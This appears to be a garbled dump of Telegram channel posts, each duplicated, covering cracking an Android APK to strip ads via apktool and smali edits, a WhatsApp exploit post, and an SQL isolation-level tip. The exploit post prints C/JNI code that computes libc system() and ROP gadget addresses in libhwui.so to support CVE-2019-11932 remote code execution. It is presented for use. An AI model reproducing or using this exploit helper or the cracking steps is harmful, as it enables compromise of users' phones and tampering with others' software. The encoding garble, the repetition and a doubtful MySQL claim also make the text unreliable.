ads mainly use the two views adStream and adwo, which are initialized and added to the page in the two methods adInit_av () and adInit_aw () respectively. If you modify these two methods to prevent them from being initialized and added, then you have achieved the goal.
2) At the same time, other places where these two views are used must be judged to prevent the program from crashing. Fortunately, they have already been performed in the original code. Empty judgment.
3) Unpack and modify the smali assembly code
After you find the advertisement page and method, you need to modify it. It is definitely impossible to directly change the jar file. You need to unpack the original apk file. The smali file generated after unpacking can be modified directly with a text editor. Unpack using apktool, copy the apk file (if you changed it to .zip , change it back to .apk ) to the apktool folder, and enter the command (xx.apk replaced with the actual name):
>apktool d xx.apk
4) you can see the unpacked folder in the same folder, with the same name as apk
5) Enter the directory generated by unpacking, and see that the folder is basically similar to direct decompression, the difference is that the smali folder is generated, the generated assembly code is inside, and the directory structure is the same as the package name
6) It is easy to find the page code XXXActivity.smali that needs to be modified , and you can open the modification directly with a text editor.
7) Search for the method adInit_av () that needs to be modified . The following is the definition of the method:
8) The middle ellipsis is the body of the method. According to the analysis of the code above, you can delete the body of the method. Then find another method adInit_aw () , also delete the method body and save the file.
SECOND STEP - CRACKING APK :
π¦ Analysis code: The
ads mainly use the two views adStream and adwo, which are initialized and added to the page in the two methods adInit_av () and adInit_aw () respectively. If you modify these two methods to prevent them from being initialized and added, then you have achieved the goal.
2) At the same time, other places where these two views are used must be judged to prevent the program from crashing. Fortunately, they have already been performed in the original code. Empty judgment.
3) Unpack and modify the smali assembly code
After you find the advertisement page and method, you need to modify it. It is definitely impossible to directly change the jar file. You need to unpack the original apk file. The smali file generated after unpacking can be modified directly with a text editor. Unpack using apktool, copy the apk file (if you changed it to .zip , change it back to .apk ) to the apktool folder, and enter the command (xx.apk replaced with the actual name):
>apktool d xx.apk
4) you can see the unpacked folder in the same folder, with the same name as apk
5) Enter the directory generated by unpacking, and see that the folder is basically similar to direct decompression, the difference is that the smali folder is generated, the generated assembly code is inside, and the directory structure is the same as the package name
6) It is easy to find the page code XXXActivity.smali that needs to be modified , and you can open the modification directly with a text editor.
7) Search for the method adInit_av () that needs to be modified . The following is the definition of the method:
8) The middle ellipsis is the body of the method. According to the analysis of the code above, you can delete the body of the method. Then find another method adInit_aw () , also delete the method body and save the file.
π¦ WELL ! THIS TUTORIAL, DETAILED HOW CRACK APK BY UNDERCODE FOR BEGINER & ADVANCED
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ LASTEST WHATSAPP EXPLOITE-TESTED 2.19 V
T.me/UNDERCODETESTING
# Vendor Homepage: https://www.whatsapp.com/
# Version: < 2.19.244
# Tested on: Whatsapp 2.19.216
# CVE: CVE-2019-11932
# Reference1: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
# Full Android App: https://github.com/valbrux/CVE-2019-11932-SupportApp
# Credits: all credits for the bug discovery goes to Awakened (https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/)
/*
*
* Introduction
* This native code file aims to be complementary to the published Whatsapp GIF RCE exploit by Awakened , by calculating the system() function address and ROP gadget address for different types of devices, which then can be used to successfully exploit the vulnerability.
* The full Android application code is available at the following link https://github.com/valbrux/CVE-2019-11932-SupportApp
*
*/
#include <jni.h>
#include <string>
#include <dlfcn.h>
#include <link.h>
typedef uint8_t byte;
char *gadget_p;
void* libc,* lib;
//dls iteration for rop
int dl_callback(struct dl_phdr_info *info, size_t size, void *data)
{
int j;
const char *base = (const char *)info->dlpi_addr;
for (j = 0; j < info->dlpi_phnum; j++) {
const ElfW(Phdr) *phdr = &info->dlpi_phdr[j];
if (phdr->p_type == PT_LOAD && (strcmp("/system/lib64/libhwui.so",info->dlpi_name) == 0)) {
gadget_p = (char *) base + phdr->p_vaddr;
return 1;
}
}
return 0;
}
//system address
void* get_system_address(){
libc = dlopen("libc.so",RTLD_GLOBAL);
void* address = dlsym( libc, "system");
return address;
}
//rop gadget address
void get_gadget_lib_base_address() {
lib = dlopen("libhwui.so",RTLD_GLOBAL);
dl_iterate_phdr(dl_callback, NULL);
}
//search gadget
long search_for_gadget_offset() {
char *buffer;
long filelen;
char curChar;
long pos = 0; int curSearch = 0;
//reading file
FILE* fd = fopen("/system/lib64/libhwui.so","rb");
fseek(fd, 0, SEEK_END);
filelen = ftell(fd);
rewind(fd);
buffer = (char *)malloc((filelen+1)*sizeof(char));
fread(buffer, filelen, 1, fd);
fclose(fd);
//searching for bytes
byte g1[12] = {0x68, 0x0E, 0x40, 0xF9, 0x60, 0x82, 0x00, 0x91, 0x00, 0x01, 0x3F, 0xD6};
while(pos <= filelen){
curChar = buffer[pos];pos++;
if(curChar == g1[curSearch]){
curSearch++;
if(curSearch > 11){
curSearch = 0;
pos-=12;
break;
}
}
else{
curSearch = 0;
}
}
return pos;
}
extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getSystem(JNIEnv* env,jobject) {
char buff[30];
//system address
snprintf(buff, sizeof(buff), "%p", get_system_address());
dlclose(libc);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}
extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getROPGadget(JNIEnv* env,jobject) {
char buff[30];
get_gadget_lib_base_address();
//gadget address
snprintf(buff, sizeof(buff), "%p",gadget_p+search_for_gadget_offset());
dlclose(lib);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}
@UNDERCODETESTING
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ LASTEST WHATSAPP EXPLOITE-TESTED 2.19 V
T.me/UNDERCODETESTING
# Vendor Homepage: https://www.whatsapp.com/
# Version: < 2.19.244
# Tested on: Whatsapp 2.19.216
# CVE: CVE-2019-11932
# Reference1: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
# Full Android App: https://github.com/valbrux/CVE-2019-11932-SupportApp
# Credits: all credits for the bug discovery goes to Awakened (https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/)
/*
*
* Introduction
* This native code file aims to be complementary to the published Whatsapp GIF RCE exploit by Awakened , by calculating the system() function address and ROP gadget address for different types of devices, which then can be used to successfully exploit the vulnerability.
* The full Android application code is available at the following link https://github.com/valbrux/CVE-2019-11932-SupportApp
*
*/
#include <jni.h>
#include <string>
#include <dlfcn.h>
#include <link.h>
typedef uint8_t byte;
char *gadget_p;
void* libc,* lib;
//dls iteration for rop
int dl_callback(struct dl_phdr_info *info, size_t size, void *data)
{
int j;
const char *base = (const char *)info->dlpi_addr;
for (j = 0; j < info->dlpi_phnum; j++) {
const ElfW(Phdr) *phdr = &info->dlpi_phdr[j];
if (phdr->p_type == PT_LOAD && (strcmp("/system/lib64/libhwui.so",info->dlpi_name) == 0)) {
gadget_p = (char *) base + phdr->p_vaddr;
return 1;
}
}
return 0;
}
//system address
void* get_system_address(){
libc = dlopen("libc.so",RTLD_GLOBAL);
void* address = dlsym( libc, "system");
return address;
}
//rop gadget address
void get_gadget_lib_base_address() {
lib = dlopen("libhwui.so",RTLD_GLOBAL);
dl_iterate_phdr(dl_callback, NULL);
}
//search gadget
long search_for_gadget_offset() {
char *buffer;
long filelen;
char curChar;
long pos = 0; int curSearch = 0;
//reading file
FILE* fd = fopen("/system/lib64/libhwui.so","rb");
fseek(fd, 0, SEEK_END);
filelen = ftell(fd);
rewind(fd);
buffer = (char *)malloc((filelen+1)*sizeof(char));
fread(buffer, filelen, 1, fd);
fclose(fd);
//searching for bytes
byte g1[12] = {0x68, 0x0E, 0x40, 0xF9, 0x60, 0x82, 0x00, 0x91, 0x00, 0x01, 0x3F, 0xD6};
while(pos <= filelen){
curChar = buffer[pos];pos++;
if(curChar == g1[curSearch]){
curSearch++;
if(curSearch > 11){
curSearch = 0;
pos-=12;
break;
}
}
else{
curSearch = 0;
}
}
return pos;
}
extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getSystem(JNIEnv* env,jobject) {
char buff[30];
//system address
snprintf(buff, sizeof(buff), "%p", get_system_address());
dlclose(libc);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}
extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getROPGadget(JNIEnv* env,jobject) {
char buff[30];
get_gadget_lib_base_address();
//gadget address
snprintf(buff, sizeof(buff), "%p",gadget_p+search_for_gadget_offset());
dlclose(lib);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}
@UNDERCODETESTING
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Telegram
UNDERCODE TESTING OFFICIAL
π¦ WELCOME TO UNDERCODE TESTING FOR LEARN HACKING & PROGRAMMING & MORE... @UndercodeTesting @iUndercode
ππΎππππ±π ΄
youtube.com/UNDERCODE
π ΅π°π ²π ΄π±πΎπΎπ Ί
Fb.com/UNDERCODETESTING
π Έπ ½πππ°π Άππ°π Ό
INSTAGRAM.com/UNDERCODETESTING
ππΎππππ±π ΄
youtube.com/UNDERCODE
π ΅π°π ²π ΄π±πΎπΎπ Ί
Fb.com/UNDERCODETESTING
π Έπ ½πππ°π Άππ°π Ό
INSTAGRAM.com/UNDERCODETESTING
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ SQL-SMALL TIP
What are the transaction isolation levels? What is the default isolation level for MySQL?
t.me/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
> The SQL standard defines four isolation levels:
1) READ-UNCOMMITTED: The lowest isolation level that allows reading of uncommitted data changes, which may cause dirty reads, phantom reads, or non-repeatable reads.
2) READ-COMMITTED (read committed): Allows reading of data that has been committed by concurrent transactions, which can prevent dirty reads, but phantom or non-repeatable reads can still occur.
3) REPEATABLE-READ (repeatable read): The results of multiple reads of the same field are consistent, unless the data is modified by the transaction itself, can prevent dirty reads and non-repeatable reads, but phantom reads may still occur.
4) SERIALIZABLE (serializable): the highest isolation level, fully obeys the ACID isolation level. All transactions are executed one by one in order, so there is no possibility of interference between transactions, that is, this level can prevent dirty reads, non-repeatable reads, and phantom reads.
π¦ Isolation level Dirty read Non-repeatable Phantom reading
READ-UNCOMMITTED β β β
READ-COMMITTED Γ β β
REPEATABLE-READ Γ Γ β
SERIALIZABLE Γ Γ Γ
The default isolation level supported by the MySQL InnoDB storage engine is REPEATABLE-READ . We can see by SELECT ;command
> mysql> SELECT @@tx_isolation;+-----------------+ @@tx_isolation| |+-----------------+| REPEATABLE-READ |+-----------------+
π¦1) It should be noted that the difference from the SQL
2) Therefore, the default isolation level supported by the InnoDB storage engine is REPEATABLE-READ (rereadable), which can completely guarantee the transaction isolation requirements, that is, the SQL standard SERIALIZABLE (serializable) isolation level has been achieved .
3) Because the lower the isolation level, the fewer locks requested by the transaction, so the isolation level of most database systems is READ-COMMITTED (read submission): but you need to know that the InnoDB storage engine uses REPEATABLE-READ (can be (Re-reading) without any performance loss.
4) InnoDB storage engine in distributed transactions under conditions generally used SERIALIZABLE (serialization) isolation level.
Written by UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ SQL-SMALL TIP
What are the transaction isolation levels? What is the default isolation level for MySQL?
t.me/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
> The SQL standard defines four isolation levels:
1) READ-UNCOMMITTED: The lowest isolation level that allows reading of uncommitted data changes, which may cause dirty reads, phantom reads, or non-repeatable reads.
2) READ-COMMITTED (read committed): Allows reading of data that has been committed by concurrent transactions, which can prevent dirty reads, but phantom or non-repeatable reads can still occur.
3) REPEATABLE-READ (repeatable read): The results of multiple reads of the same field are consistent, unless the data is modified by the transaction itself, can prevent dirty reads and non-repeatable reads, but phantom reads may still occur.
4) SERIALIZABLE (serializable): the highest isolation level, fully obeys the ACID isolation level. All transactions are executed one by one in order, so there is no possibility of interference between transactions, that is, this level can prevent dirty reads, non-repeatable reads, and phantom reads.
π¦ Isolation level Dirty read Non-repeatable Phantom reading
READ-UNCOMMITTED β β β
READ-COMMITTED Γ β β
REPEATABLE-READ Γ Γ β
SERIALIZABLE Γ Γ Γ
The default isolation level supported by the MySQL InnoDB storage engine is REPEATABLE-READ . We can see by SELECT ;command
> mysql> SELECT @@tx_isolation;+-----------------+ @@tx_isolation| |+-----------------+| REPEATABLE-READ |+-----------------+
π¦1) It should be noted that the difference from the SQL
2) Therefore, the default isolation level supported by the InnoDB storage engine is REPEATABLE-READ (rereadable), which can completely guarantee the transaction isolation requirements, that is, the SQL standard SERIALIZABLE (serializable) isolation level has been achieved .
3) Because the lower the isolation level, the fewer locks requested by the transaction, so the isolation level of most database systems is READ-COMMITTED (read submission): but you need to know that the InnoDB storage engine uses REPEATABLE-READ (can be (Re-reading) without any performance loss.
4) InnoDB storage engine in distributed transactions under conditions generally used SERIALIZABLE (serialization) isolation level.
Written by UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β